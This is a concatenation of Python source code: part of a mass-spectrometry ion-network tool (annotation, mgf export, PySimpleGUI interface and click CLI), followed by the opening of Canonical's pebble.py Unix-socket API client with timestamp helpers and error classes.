        parameters["fdr_filter"] = fdr_filter
    if align_to_database is not None:
        parameters["align_to_database"] = align_to_database
    if threads is not None:
        ms_utils.set_threads(threads)
    # TODO: Proper parsing of empty log...?
    if (log_file_name is None) or (log_file_name == ""):
        log_file_name = parameters["log_file_name"]
    with ms_utils.open_logger(log_file_name) as logger:
        if mgf_format:
            logger.info(f"Annotating mgf files")
            input_file_names = ms_utils.get_file_names_with_extension(
                input_path,
                extension=".mgf"
            )
        else:
            logger.info(f"Annotating ion-networks")
            input_file_names = ms_utils.get_file_names_with_extension(
                input_path,
                extension=".evidence.hdf"
            )
        file_count = len(input_file_names)
        logger.info(
            f"{file_count} input_file{'s' if file_count != 1 else ''}"
            f": {input_file_names}"
        )
        logger.info(f"database_file_name: {database_file_name}")
        logger.info(f"parameter_file_name: {parameter_file_name}")
        logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
        logger.info(f"fragment_ppm: {parameters['annotation_ppm']}")
        logger.info(f"fdr_filter: {parameters['fdr_filter']}")
        logger.info(f"align_to_database: {align_to_database}")
        # TODO implement fdr filtering!!!
        logger.info(f"export_decoys: {parameters['export_decoys']}")
        logger.info("")
        database = ms_database.HDF_Database_File(database_file_name)
        for file_name in input_file_names:
            if mgf_format:
                # Strip ".mgf" to build the output name.
                file_name_base = '.'.join(file_name.split('.')[:-1])
                out_file_name = f"{file_name_base}.annotation.csv"
                ms_utils.annotate_mgf(
                    file_name,
                    database,
                    out_file_name,
                    parameters,
                )
            else:
                # Strip ".evidence.hdf" (two extensions) to build the output name.
                file_name_base = '.'.join(file_name.split('.')[:-2])
                out_file_name = f"{file_name_base}.annotation.csv"
                evidence = ms_run_files.HDF_Evidence_File(file_name)
                evidence.annotate(database, out_file_name, parameters)
def create_mgfs(
    input_path,
    output_directory,
    parameter_file_name,
    log_file_name,
    threads=None
):
    """
    Create [*.mgf] files from [*.evidence.hdf] evidence files.
    Parameters
    ----------
    input_path : iterable[str]
        An iterable with file and/or folder names.
    output_directory : str or None
        If provided, it is used as a fallback location for the log file.
        NOTE(review): the mgf files themselves are always created next to
        their evidence files by `evidence.create_mgf` — confirm whether
        output_directory should be forwarded there.
    parameter_file_name : str or None
        If provided, parameters will be read from this file.
    log_file_name : str or None
        If provided, all logs will be written to this file.
    threads : int or None
        If provided, override the maximum number of threads to use.
    """
    if parameter_file_name is None:
        parameter_file_name = ""
    if parameter_file_name != "":
        parameter_file_name = os.path.abspath(parameter_file_name)
    if output_directory is None:
        output_directory = ""
    if output_directory != "":
        output_directory = os.path.abspath(output_directory)
    parameters = ms_utils.read_parameters_from_json_file(
        file_name=parameter_file_name,
        default="mgf"
    )
    if threads is not None:
        ms_utils.set_threads(threads)
    # TODO: Proper parsing of empty log...?
    if (log_file_name is None) or (log_file_name == ""):
        log_file_name = parameters["log_file_name"]
    if log_file_name == "":
        log_file_name = output_directory
    with ms_utils.open_logger(log_file_name) as logger:
        # Fixed copy-paste error: this function creates mgf files, not
        # ion-networks (the old message was copied from create_ion_networks).
        logger.info("Creating mgf files")
        input_file_names = ms_utils.get_file_names_with_extension(
            input_path,
            ".evidence.hdf"
        )
        file_count = len(input_file_names)
        logger.info(
            f"{file_count} input_file{'s' if file_count != 1 else ''}"
            f": {input_file_names}"
        )
        logger.info(f"output_directory: {output_directory}")
        logger.info(f"parameter_file_name: {parameter_file_name}")
        logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
        logger.info("")
        for input_file in input_file_names:
            evidence = ms_run_files.HDF_Evidence_File(input_file)
            evidence.create_mgf(parameters=parameters)
class GUI(object):
    """Graphical user interface to convert, create, evidence and show
    ion-networks.

    Each entry of ``self.window`` starts out as a layout (a list of rows) and
    is only turned into an actual ``sg.Window`` the first time it is
    activated (see ``swap_active_window``).
    """

    def __init__(
        self,
        start=False,
        widget_size=20,
    ):
        """Create all window layouts and open the main window.

        Parameters
        ----------
        start : bool
            If True, immediately enter the event loop.
        widget_size : int
            Base widget width (in characters) for buttons and inputs.
        """
        self.widget_size = widget_size
        self.window = {}
        self.evaluate_window = {}
        update_message = ms_utils.verify_version()
        if update_message != "":
            sg.popup(
                update_message,
                title="Update available",
                non_blocking=True
            )
        self.init_main_window()
        self.init_convert_window()
        self.init_create_window()
        self.init_evidence_window()
        self.init_terminal_window()
        self.window["Main"] = sg.Window(
            "Main",
            self.window["Main"],
            finalize=True
        )
        self.active_window_name = "Main"
        if start:
            self.run()

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        # Close every window that was actually instantiated; entries that are
        # still plain layouts (lists) have nothing to close.
        for window in list(self.window.values()):
            if not isinstance(window, list):
                window.close()

    def init_main_window(self):
        """Define the main menu layout and register its event handler."""
        self.window["Main"] = [
            [sg.Button("Convert", size=(self.widget_size, 1))],
            [sg.Button("Create", size=(self.widget_size, 1))],
            [sg.Button("Evidence", size=(self.widget_size, 1))],
            [sg.Button("Show", size=(self.widget_size, 1))],
        ]
        self.evaluate_window["Main"] = self.evaluate_main_window

    def init_convert_window(self):
        """Define the convert window layout and register its event handler."""
        default_data_type = "HDMSE"
        self.window["Convert"] = [
            [
                sg.Text('Data type', size=(self.widget_size, 1)),
                sg.Combo(
                    sorted(ms_utils.DATA_TYPE_FILE_EXTENSIONS),
                    default_value=default_data_type,
                    key="data_type",
                    size=(self.widget_size * 2, 1)
                    # enable_events=True
                )
            ],
            self.add_input_path_to_layout(
                file_types=(
                    (
                        key,
                        f"*{value}"
                    ) for key, value in sorted(
                        ms_utils.DATA_TYPE_FILE_EXTENSIONS.items()
                    )
                ),
                # TODO: default_value=default_data_type,
            ),
            self.add_output_directory_to_layout(),
            self.add_parameter_file_to_layout(),
            self.add_log_file_to_layout(),
            self.add_main_menu_and_continue_buttons_to_layout()
        ]
        self.evaluate_window["Convert"] = self.evaluate_convert_window

    def init_create_window(self):
        """Define the create window layout and register its event handler."""
        self.window["Create"] = [
            self.add_input_path_to_layout(
                file_types=(('Ion-networks', '*.inet.csv'),)
            ),
            self.add_output_directory_to_layout(),
            self.add_parameter_file_to_layout(),
            self.add_log_file_to_layout(),
            self.add_main_menu_and_continue_buttons_to_layout(),
        ]
        self.evaluate_window["Create"] = self.evaluate_create_window

    def init_evidence_window(self):
        """Define the evidence window layout and register its event handler."""
        self.window["Evidence"] = [
            self.add_input_path_to_layout(
                file_types=(('Ion-networks', '*.inet.hdf'),)
            ),
            self.add_parameter_file_to_layout(),
            self.add_log_file_to_layout(),
            self.add_main_menu_and_continue_buttons_to_layout(),
        ]
        self.evaluate_window["Evidence"] = self.evaluate_evidence_window

    def init_terminal_window(self):
        """Define the terminal window layout (captures stdout via sg.Output)."""
        self.window["Terminal"] = [
            [sg.Output(size=(150, 50))],
            self.add_main_menu_and_continue_buttons_to_layout(
                continue_button=False
            )
        ]

    def evaluate_main_window(self, event, values):
        """Handle a main-menu event by switching to the requested window."""
        if event == "Show":
            # The browser blocks, so hide all windows while it runs.
            self.swap_active_window("")
            show_ion_network(
                "",
                ""
            )
            self.swap_active_window("Main")
        else:
            self.swap_active_window(event)

    def evaluate_convert_window(self, event, values):
        """Handle an event of the convert window."""
        if event == "Submit":
            self.run_terminal_command(
                convert_data_formats_to_csvs,
                values["input_path"].split(";"),
                values["data_type"],
                values["output_directory"],
                values["parameter_file_name"],
                values["log_file_name"]
            )

    def evaluate_create_window(self, event, values):
        """Handle an event of the create window."""
        if event == "Submit":
            self.run_terminal_command(
                create_ion_networks,
                values["input_path"].split(";"),
                values["output_directory"],
                values["parameter_file_name"],
                values["log_file_name"]
            )

    def evaluate_evidence_window(self, event, values):
        """Handle an event of the evidence window."""
        if event == "Submit":
            self.run_terminal_command(
                evidence_ion_networks,
                values["input_path"].split(";"),
                values["parameter_file_name"],
                values["log_file_name"]
            )

    def add_input_path_to_layout(
        self,
        file_types=(('ALL Files', '*.*'),),
        title="Input path",
        key="input_path",
        multiple=True,
        default_value=None,
    ):
        """Return a layout row with an input path text field and browser.

        Parameters
        ----------
        file_types : iterable of (label, pattern) tuples
            File filters for the browse dialog.
        title : str
            Label shown next to the input field.
        key : str
            Key under which the value appears in the window's values dict.
        multiple : bool
            If True, allow selecting multiple files (";"-separated).
        default_value : object or None
            Currently unused placeholder (see TODO in init_convert_window).
        """
        # TODO: Multiple and independent files?
        if multiple:
            browse_button = sg.FilesBrowse(
                size=(self.widget_size, 1),
                file_types=file_types
            )
        else:
            browse_button = sg.FileBrowse(
                size=(self.widget_size, 1),
                file_types=file_types,
                # TODO: default file_type?
            )
        row = [
            sg.Text(title, size=(self.widget_size, 1)),
            sg.Input(
                key=key,
                size=(self.widget_size * 2, 1)
            ),
            browse_button,
        ]
        return row

    def add_output_directory_to_layout(self):
        """Return a layout row with an output directory field and browser."""
        row = [
            sg.Text("Output directory", size=(self.widget_size, 1)),
            sg.Input(
                key="output_directory",
                size=(self.widget_size * 2, 1)
            ),
            sg.FolderBrowse(size=(self.widget_size, 1)),
        ]
        return row

    def add_parameter_file_to_layout(self, default=""):
        """Return a layout row with a parameter (json) file field and browser."""
        row = [
            sg.Text("Parameter file", size=(self.widget_size, 1)),
            sg.Input(
                key="parameter_file_name",
                size=(self.widget_size * 2, 1),
                default_text=default
            ),
            sg.FileBrowse(
                size=(self.widget_size, 1),
                file_types=(('Parameter', '*.json'),)
            ),
        ]
        return row

    def add_log_file_to_layout(self, default=""):
        """Return a layout row with a log file field and save-as browser."""
        # TODO: remove overwrite warning
        # TODO: default log / empty log not parsed properly
        row = [
            sg.Text("Log file", size=(self.widget_size, 1)),
            sg.Input(
                key="log_file_name",
                size=(self.widget_size * 2, 1),
                default_text=default
            ),
            sg.FileSaveAs(size=(self.widget_size, 1)),
        ]
        return row

    def add_main_menu_and_continue_buttons_to_layout(
        self,
        main_menu_button=True,
        continue_button=True
    ):
        """Return a layout row with optional main-menu and submit buttons."""
        row = []
        if main_menu_button:
            row.append(
                sg.Button("Return to main menu", size=(self.widget_size, 1))
            )
        if continue_button:
            row.append(sg.Button("Submit", size=(self.widget_size, 1)))
        return row

    def run(self):
        """Run the event loop until every window has been closed."""
        while self.active_window_name is not None:
            window = self.window[self.active_window_name]
            event, values = window.read(timeout=10)
            if event == sg.TIMEOUT_KEY:
                continue
            elif event is None:
                # Window was closed by the user; end the loop.
                self.active_window_name = None
            elif event == "Return to main menu":
                self.swap_active_window("Main")
            else:
                self.evaluate_window[self.active_window_name](event, values)

    def run_terminal_command(self, command, *args):
        """Run command(*args) in a background thread, showing the terminal.

        The "Return to main menu" button is disabled while the command runs
        and re-enabled when it finishes.
        """
        self.swap_active_window("Terminal")
        self.window["Terminal"].read(timeout=10)
        self.window["Terminal"]["Return to main menu"].Update(
            text="Executing, please wait",
            disabled=True
        )
        thread = threading.Thread(target=command, args=args)
        # Fixed: the original set a misspelled 'deamon' attribute *after*
        # start(), which had no effect. Daemon status must be set before the
        # thread is started so it cannot keep the interpreter alive.
        thread.daemon = True
        thread.start()
        # Fixed: Thread.isAlive() was removed in Python 3.9; use is_alive().
        while thread.is_alive():
            event, values = self.window["Terminal"].read(timeout=10)
            if event is None:
                sg.Popup(
                    "WARNING, thread is still running in the background!",
                    title="WARNING",
                    button_color=("Black", "Red")
                )
                self.active_window_name = None
        self.window["Terminal"]["Return to main menu"].Update(
            text="Return to main menu",
            disabled=False
        )

    def swap_active_window(self, new_window_name=""):
        """Hide the current window and show (creating if needed) another.

        An empty name hides the current window without showing a new one.
        """
        # TODO: Docstring, implement
        if self.active_window_name != "":
            self.window[self.active_window_name].Hide()
        if new_window_name != "":
            # Lazily instantiate the window from its layout on first use.
            if isinstance(self.window[new_window_name], list):
                self.window[new_window_name] = sg.Window(
                    new_window_name,
                    self.window[new_window_name],
                    finalize=True
                )
            self.window[new_window_name].UnHide()
        self.active_window_name = new_window_name
class CLI(object):
    """Command line interface to convert, create, evidence, show, annotate
    and export ion-networks.

    Each subcommand is a click command defined as a static method; __init__
    registers all of them on the ``main`` group and immediately invokes it.
    """

    CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])

    def __init__(self):
        print(ms_utils.verify_version())
        # TODO: process update message
        self.main.add_command(CLI.convert)
        self.main.add_command(CLI.create)
        self.main.add_command(CLI.evidence)
        self.main.add_command(CLI.show)
        self.main.add_command(CLI.gui)
        self.main.add_command(CLI.database)
        self.main.add_command(CLI.annotate)
        self.main.add_command(CLI.mgf)
        self.main()

    @staticmethod
    @click.group(
        context_settings=CONTEXT_SETTINGS,
        help="Analysis of LC-[...]-MSMS data with ion-networks."
    )
    def main():
        pass

    @staticmethod
    @click.command(
        "convert",
        help="Convert [input.*] files with centroided ions to unified "
        "[input.inet.csv] csv files.",
        short_help="Convert various input formats to unified input."
    )
    @click.option(
        "--input_path",
        "-i",
        help="An [input.*] file with centroided ion peaks that needs to be "
        "converted to a unified [input.inet.csv] file. "
        "Individual files can be provided, as well as folders. "
        "This flag can be set multiple times.",
        multiple=True,
        required=True,
        type=click.Path(exists=True)
    )
    @click.option(
        '--data_type',
        '-d',
        help="The data type of the [input.*] file. If this is DDA, a [*.mgf] "
        "file that was centroided with ms-convert is expected with the field "
        "RTINSECONDS as LC coordinate. "
        "For HDMSE, SONAR and SWIM-DIA, a [*_Apex3DIons.csv] generated with "
        "Waters' Apex3d is expected, typically generated as follows "
        "'Apex3D64.exe -pRawDirName sample.raw -outputDirName "
        "peak_picked_sample_folder -lockMassZ2 785.8426 "
        "-lockmassToleranceAMU 0.25 -bCSVOutput 1 -writeFuncCsvFiles 0 "
        "-leThresholdCounts 1 -heThresholdCounts 1 -apexTrackSNRThreshold 1 "
        "-bEnableCentroids 0'. "
        "For DIAPASEF, a [*_centroided.hdf] file generated with diapasef.py "
        "(https://github.com/swillems/diapasef) is expected.",
        required=True,
        type=click.Choice(
            ['DDA', 'HDMSE', "SONAR", "SWIMDIA", "DIAPASEF"],
            case_sensitive=True
        )
    )
    @click.option(
        "--output_directory",
        "-o",
        help="For each [input.*] file, an [input.inet.csv] file is created. "
        "If no output directory is provided, each [input.inet.csv] file is "
        "placed in the same folder as its corresponding [input.*] file. "
        "This output directory can also be supplied through a "
        "[parameters.json] file. "
        "WARNING: This overrides already existing files without "
        "confirmation.",
        type=click.Path(file_okay=False),
    )
    @click.option(
        "--parameter_file",
        "-p",
        "parameter_file_name",
        help="A [parameters.json] file with optional parameters.",
        type=click.Path(exists=True, dir_okay=False),
    )
    @click.option(
        "--log_file",
        "-l",
        "log_file_name",
        help="Save the log to a [log.txt] file. "
        "By default this is written to the current directory. "
        "This log file can also be supplied through a [parameters.json] "
        "file. It can be turned off by providing an empty path (i.e. ''). "
        "If the log file already exists, the new log data is appended.",
        type=click.Path(),
    )
    def convert(
        input_path,
        output_directory,
        data_type,
        parameter_file_name,
        log_file_name
    ):
        convert_data_formats_to_csvs(
            input_path,
            data_type,
            output_directory,
            parameter_file_name,
            log_file_name
        )

    @staticmethod
    @click.command(
        "create",
        help="Create [input.inet.hdf] ion-network files from unified "
        "[input.inet.csv] files.",
        short_help="Create ion-networks from unified input."
    )
    @click.option(
        "--input_path",
        "-i",
        help="A unified [input.inet.csv] file with centroided ion peaks. "
        "Columns with headers PRECURSOR_RT, FRAGMENT_MZ and "
        "FRAGMENT_LOGINT always need to be present. "
        "All columns whose header start with # are not interpreted as ion "
        "coordinates but as comments such as e.g. prior annotations. "
        "All other columns (e.g. PRECURSOR_MZ or PRECURSOR_DT) are "
        "automatically interpreted as dimensions with ion coordinates. "
        "All PRECURSOR_* dimensions are used to create edges between ions. "
        "Individual files can be provided, as well as folders. "
        "This flag can be set multiple times.",
        multiple=True,
        required=True,
        type=click.Path(exists=True)
    )
    @click.option(
        "--output_directory",
        "-o",
        help="For each [input.inet.csv] file, an [input.inet.hdf] ion-network "
        "file is created. "
        "If no output directory is provided, each [input.inet.hdf] file is "
        "placed in the same folder as its corresponding [input.inet.csv] "
        "file. "
        "This output directory can also be supplied through a "
        "[parameters.json] file. "
        "WARNING: This overrides already existing files without "
        "confirmation.",
        type=click.Path(file_okay=False)
    )
    @click.option(
        "--parameter_file",
        "-p",
        "parameter_file_name",
        help="A [parameters.json] file with optional parameters.",
        type=click.Path(exists=True, dir_okay=False)
    )
    @click.option(
        "--log_file",
        "-l",
        "log_file_name",
        help="Save the log to a [log.txt] file. "
        "By default this is written to the current directory. "
        "This log file can also be supplied through a [parameters.json] "
        "file. It can be turned off by providing an empty path (i.e. ''). "
        "If the log file already exists, the new log data is appended.",
        type=click.Path()
    )
    @click.option(
        "--threads",
        "-t",
        "threads",
        help="The number of threads to use.",
        type=int
    )
    def create(
        input_path,
        output_directory,
        parameter_file_name,
        log_file_name,
        threads
    ):
        create_ion_networks(
            input_path,
            output_directory,
            parameter_file_name,
            log_file_name,
            threads
        )

    @staticmethod
    @click.command(
        "evidence",
        help="Collect pairwise evidence for [input.inet.hdf] ion-network files "
        "as [input.evidence.hdf] evidence files.",
        short_help="Collect evidence for ion-networks."
    )
    @click.option(
        "--input_path",
        "-i",
        help="An [input.inet.hdf] ion-network file. "
        "Individual files can be provided, as well as folders. "
        "This flag can be set multiple times.",
        required=True,
        multiple=True,
        type=click.Path(exists=True)
    )
    @click.option(
        "--parameter_file",
        "-p",
        "parameter_file_name",
        help="A [parameters.json] file with optional parameters.",
        type=click.Path(exists=True, dir_okay=False)
    )
    @click.option(
        "--log_file",
        "-l",
        "log_file_name",
        help="Save the log to a [log.txt] file. "
        "By default this is written to the current directory. "
        "This log file can also be supplied through a [parameters.json] "
        "file. It can be turned off by providing an empty path (i.e. ''). "
        "If the log file already exists, the new log data is appended.",
        type=click.Path()
    )
    @click.option(
        "--threads",
        "-t",
        "threads",
        help="The number of threads to use.",
        type=int
    )
    def evidence(
        input_path,
        parameter_file_name,
        log_file_name,
        threads
    ):
        evidence_ion_networks(
            input_path,
            parameter_file_name,
            log_file_name,
            threads
        )

    @staticmethod
    # TODO: Implement
    @click.command(
        "show",
        help="Show and browse ion-networks and their evidence.",
        short_help="Show and browse ion-networks."
    )
    @click.option(
        "--parameter_file",
        "-p",
        "parameter_file_name",
        help="A [parameters.json] file with optional parameters.",
        type=click.Path(exists=True, dir_okay=False)
    )
    @click.option(
        "--log_file",
        "-l",
        "log_file_name",
        help="Save the log to a [log.txt] file. "
        "By default this is written to the current directory. "
        "This log file can also be supplied through a [parameters.json] "
        "file. It can be turned off by providing an empty path (i.e. ''). "
        "If the log file already exists, the new log data is appended.",
        type=click.Path()
    )
    def show(
        parameter_file_name,
        log_file_name
    ):
        show_ion_network(
            parameter_file_name,
            log_file_name
        )

    @staticmethod
    @click.command(
        "gui",
        help="Graphical user interface to analyse ion-networks.",
    )
    def gui():
        run_ion_network_gui()

    @staticmethod
    @click.command(
        "database",
        help="Create a [database.hdf] from fasta files.",
        short_help="Create database from fasta files."
    )
    @click.option(
        "--input_path",
        "-i",
        help="A fasta file with protein sequences. "
        "Individual files can be provided, as well as folders. "
        "This flag can be set multiple times.",
        multiple=True,
        required=True,
        type=click.Path(exists=True)
    )
    @click.option(
        "--output_directory",
        "-o",
        help="The output directory for the database. The file name is "
        "automatically set as a concatenation of the input fasta files, "
        "potentially appended with _concatenated_decoy. "
        "This output directory can also be supplied through a "
        "[parameters.json] file. "
        "WARNING: This overrides already existing files without "
        "confirmation.",
        type=click.Path(file_okay=False)
    )
    @click.option(
        "--parameter_file",
        "-p",
        "parameter_file_name",
        help="A [parameters.json] file with optional parameters.",
        type=click.Path(exists=True, dir_okay=False)
    )
    @click.option(
        "--log_file",
        "-l",
        "log_file_name",
        help="Save the log to a [log.txt] file. "
        "By default this is written to the current directory. "
        "This log file can also be supplied through a [parameters.json] "
        "file. It can be turned off by providing an empty path (i.e. ''). "
        "If the log file already exists, the new log data is appended.",
        type=click.Path()
    )
    @click.option(
        "--threads",
        "-t",
        "threads",
        help="The number of threads to use.",
        type=int
    )
    def database(
        input_path,
        output_directory,
        parameter_file_name,
        log_file_name,
        threads
    ):
        create_database(
            input_path,
            output_directory,
            parameter_file_name,
            log_file_name,
            threads
        )

    @staticmethod
    @click.command(
        "annotate",
        help="Annotate ion-network files.",
        short_help="Annotate ion-network files."
    )
    @click.option(
        "--input_path",
        "-i",
        help="An [input.evidence.hdf] evidence file. "
        "Individual files can be provided, as well as folders. "
        "This flag can be set multiple times.",
        required=True,
        multiple=True,
        type=click.Path(exists=True)
    )
    @click.option(
        "--database_file",
        "-d",
        "database_file_name",
        help="A [database.hdf] file.",
        required=True,
        type=click.Path(exists=True, dir_okay=False),
    )
    @click.option(
        '--mgf_format',
        '-m',
        'mgf_format',
        help="Input is in mgf format",
        is_flag=True,
        default=False,
        show_default=True,
    )
    @click.option(
        "--parameter_file",
        "-p",
        "parameter_file_name",
        help="A [parameters.json] file with optional parameters.",
        type=click.Path(exists=True, dir_okay=False)
    )
    @click.option(
        "--log_file",
        "-l",
        "log_file_name",
        help="Save the log to a [log.txt] file. "
        "By default this is written to the current directory. "
        "This log file can also be supplied through a [parameters.json] "
        "file. It can be turned off by providing an empty path (i.e. ''). "
        "If the log file already exists, the new log data is appended.",
        type=click.Path()
    )
    @click.option(
        "--threads",
        "-t",
        "threads",
        help="The number of threads to use.",
        type=int
    )
    @click.option(
        "--fragment_ppm_error",
        "-e",
        "fragment_ppm_error",
        help="The maximum allowed fragment ppm error.",
        type=float
    )
    @click.option(
        "--export_decoys",
        "-x",
        "export_decoys",
        help="Include decoy hits in the export.",
        is_flag=True,
        default=False,
        show_default=True,
    )
    @click.option(
        "--fdr_filter",
        "-f",
        "fdr_filter",
        help="Remove annotations above this fdr.",
        type=float
    )
    @click.option(
        "--align_to_database",
        "-c",
        "align_to_database",
        help="Align to database",
        is_flag=True,
        default=True,
        show_default=True,
    )
    def annotate(
        input_path,
        database_file_name,
        mgf_format,
        parameter_file_name,
        log_file_name,
        threads,
        fragment_ppm_error,
        export_decoys,
        fdr_filter,
        align_to_database,
    ):
        # Resolves to the module-level annotate() function, not this command.
        annotate(
            input_path,
            database_file_name,
            mgf_format,
            parameter_file_name,
            log_file_name,
            threads,
            fragment_ppm_error,
            export_decoys,
            fdr_filter,
            align_to_database
        )

    @staticmethod
    @click.command(
        "mgf",
        help="Create [input.MGF] ion-network files from evidence "
        "[input.evidence.hdf] files.",
        short_help="Create mgf files from evidence."
    )
    @click.option(
        "--input_path",
        "-i",
        help="An evidence [input.evidence.hdf] file. "
        "Individual files can be provided, as well as folders. "
        "This flag can be set multiple times.",
        multiple=True,
        required=True,
        type=click.Path(exists=True)
    )
    @click.option(
        "--output_directory",
        "-o",
        help="For each [input.evidence.hdf] file, an [input.mgf] "
        "file is created. "
        "If no output directory is provided, each [input.mgf] file is "
        "placed in the same folder as its corresponding "
        "[input.evidence.hdf] file. "
        "This output directory can also be supplied through a "
        "[parameters.json] file. "
        "WARNING: This overrides already existing files without "
        "confirmation.",
        type=click.Path(file_okay=False)
    )
    @click.option(
        "--parameter_file",
        "-p",
        "parameter_file_name",
        help="A [parameters.json] file with optional parameters.",
        type=click.Path(exists=True, dir_okay=False)
    )
    @click.option(
        "--log_file",
        "-l",
        "log_file_name",
        help="Save the log to a [log.txt] file. "
        "By default this is written to the current directory. "
        "This log file can also be supplied through a [parameters.json] "
        "file. It can be turned off by providing an empty path (i.e. ''). "
        "If the log file already exists, the new log data is appended.",
        type=click.Path()
    )
    def mgf(
        input_path,
        output_directory,
        parameter_file_name,
        log_file_name
    ):
        create_mgfs(
            input_path,
            output_directory,
            parameter_file_name,
            log_file_name
        )
# TODO: Rename "unified" and "peaks" referring to .inet.csv files?
# TODO: Define help text in separate json files?
# TODO: Show help text popups in GUI
# TODO: Database interface (CLI + GUI)
# TODO: Annotation interface (CLI + GUI)
# -pRawDirName ~/sandbox/HDMSE_test/171114_HDMSE_Mclass_K562_30min_01.raw -outputDirName ~/sandbox/HDMSE_test/ -lockMassZ2 785.8426 -lockmassToleranceAMU 0.25 -bCSVOutput 1 -writeFuncCsvFiles 0 -leThresholdCounts 1 -heThresholdCounts 1 -apexTrackSNRThreshold 1 -bEnableCentroids 0
|
pebble.py | # Copyright 2021 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for the Pebble API (HTTP over Unix socket).
For a command-line interface for local testing, see test/pebble_cli.py.
"""
import binascii
import cgi
import datetime
import email.parser
import enum
import http.client
import io
import json
import logging
import os
import re
import select
import shutil
import signal
import socket
import sys
import threading
import time
import typing
import urllib.error
import urllib.parse
import urllib.request
import warnings
from ops._private import yaml
from ops._vendor import websocket
logger = logging.getLogger(__name__)
_not_provided = object()
class _UnixSocketConnection(http.client.HTTPConnection):
    """Implementation of HTTPConnection that connects to a named Unix socket."""
    def __init__(self, host, timeout=_not_provided, socket_path=None):
        # The _not_provided sentinel distinguishes "no timeout given" from an
        # explicit timeout of None (which means blocking mode to HTTPConnection).
        if timeout is _not_provided:
            super().__init__(host)
        else:
            super().__init__(host, timeout=timeout)
        self.socket_path = socket_path
    def connect(self):
        """Override connect to use Unix socket (instead of TCP socket)."""
        if not hasattr(socket, 'AF_UNIX'):
            raise NotImplementedError('Unix sockets not supported on {}'.format(sys.platform))
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.socket_path)
        # NOTE(review): when no timeout was given, HTTPConnection stores its
        # own global-default sentinel in self.timeout, so this comparison is
        # against _not_provided rather than that sentinel — confirm intended.
        if self.timeout is not _not_provided:
            self.sock.settimeout(self.timeout)
class _UnixSocketHandler(urllib.request.AbstractHTTPHandler):
    """Implementation of HTTPHandler that uses a named Unix socket."""
    def __init__(self, socket_path):
        # socket_path: filesystem path of the Unix domain socket to connect to.
        super().__init__()
        self.socket_path = socket_path
    def http_open(self, req):
        """Override http_open to use a Unix socket connection (instead of TCP)."""
        return self.do_open(_UnixSocketConnection, req, socket_path=self.socket_path)
# Matches yyyy-mm-ddTHH:MM:SS(.sss)ZZZ
_TIMESTAMP_RE = re.compile(
r'(\d{4})-(\d{2})-(\d{2})[Tt](\d{2}):(\d{2}):(\d{2})(\.\d+)?(.*)')
# Matches [-+]HH:MM
_TIMEOFFSET_RE = re.compile(r'([-+])(\d{2}):(\d{2})')
def _parse_timestamp(s):
"""Parse timestamp from Go-encoded JSON.
This parses RFC3339 timestamps (which are a subset of ISO8601 timestamps)
that Go's encoding/json package produces for time.Time values.
Unfortunately we can't use datetime.fromisoformat(), as that does not
support more than 6 digits for the fractional second, nor the 'Z' for UTC.
Also, it was only introduced in Python 3.7.
"""
match = _TIMESTAMP_RE.match(s)
if not match:
raise ValueError('invalid timestamp {!r}'.format(s))
y, m, d, hh, mm, ss, sfrac, zone = match.groups()
if zone in ('Z', 'z'):
tz = datetime.timezone.utc
else:
match = _TIMEOFFSET_RE.match(zone)
if not match:
raise ValueError('invalid timestamp {!r}'.format(s))
sign, zh, zm = match.groups()
tz_delta = datetime.timedelta(hours=int(zh), minutes=int(zm))
tz = datetime.timezone(tz_delta if sign == '+' else -tz_delta)
microsecond = round(float(sfrac or '0') * 1000000)
return datetime.datetime(int(y), int(m), int(d), int(hh), int(mm), int(ss),
microsecond=microsecond, tzinfo=tz)
def _format_timeout(timeout: float):
"""Format timeout for use in the Pebble API.
The format is in seconds with a millisecond resolution and an 's' suffix,
as accepted by the Pebble API (which uses Go's time.ParseDuration).
"""
return '{:.3f}s'.format(timeout)
def _json_loads(s: typing.Union[str, bytes]) -> typing.Dict:
"""Like json.loads(), but handle str or bytes.
This is needed because an HTTP response's read() method returns bytes on
Python 3.5, and json.load doesn't handle bytes.
"""
if isinstance(s, bytes):
s = s.decode('utf-8')
return json.loads(s)
def _start_thread(target, *args, **kwargs) -> threading.Thread:
"""Helper to simplify starting a thread."""
thread = threading.Thread(target=target, args=args, kwargs=kwargs)
thread.start()
return thread
class Error(Exception):
    """Base class of most errors raised by the Pebble client."""

    def __repr__(self):
        cls = type(self)
        return '<{}.{} {}>'.format(cls.__module__, cls.__name__, self.args)

    def name(self):
        """Return a string representation of the model plus class."""
        cls = type(self)
        return '<{}.{}>'.format(cls.__module__, cls.__name__)

    def message(self):
        """Return the message passed as an argument."""
        return self.args[0]
class TimeoutError(TimeoutError, Error):
    """Raised when a polling timeout occurs.

    Also subclasses the builtin TimeoutError, so callers can catch either.
    """
class ConnectionError(Error):
    """Raised when the Pebble client can't connect to the socket."""
class ProtocolError(Error):
    """Raised on a higher-level protocol error when talking to Pebble."""
class PathError(Error):
    """Raised when there's an error with a specific path."""

    def __init__(self, kind: str, message: str):
        """This shouldn't be instantiated directly."""
        self.kind = kind        # short machine-readable error kind
        self.message = message  # human-readable detail

    def __str__(self):
        return '%s - %s' % (self.kind, self.message)

    def __repr__(self):
        return 'PathError(%r, %r)' % (self.kind, self.message)
class APIError(Error):
    """Raised when an HTTP API error occurs talking to the Pebble server."""

    def __init__(self, body: typing.Dict, code: int, status: str, message: str):
        """This shouldn't be instantiated directly."""
        super().__init__(message)  # Makes str(e) return message
        self.body = body        # decoded JSON body of the error response
        self.code = code        # HTTP status code
        self.status = status    # HTTP reason phrase
        self.message = message

    def __repr__(self):
        return 'APIError(%r, %r, %r, %r)' % (
            self.body, self.code, self.status, self.message)
class ChangeError(Error):
    """Raised by actions when a change is ready but has an error.

    For example, this happens when you attempt to start an already-started
    service:

    cannot perform the following tasks:
    - Start service "test" (service "test" was previously started)
    """

    def __init__(self, err: str, change: 'Change'):
        """This shouldn't be instantiated directly."""
